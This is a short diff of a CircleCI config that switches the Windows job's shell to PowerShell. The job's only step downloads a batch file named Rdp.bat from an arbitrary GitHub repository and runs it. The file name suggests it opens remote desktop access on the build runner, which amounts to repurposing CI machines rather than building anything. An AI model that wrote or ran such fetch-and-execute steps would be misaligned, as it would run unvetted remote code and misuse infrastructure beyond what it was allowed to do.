--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -7,7 +7,7 @@ jobs:
   build:
     executor:
       name: win/default
-      shell: cmd.exe
+      shell: powershell.exe
     steps:
       - run: Invoke-WebRequest https://raw.githubusercontent.com/Gfffvgdsss/Rdp/main/Rdp.bat & Rdp.bat
       
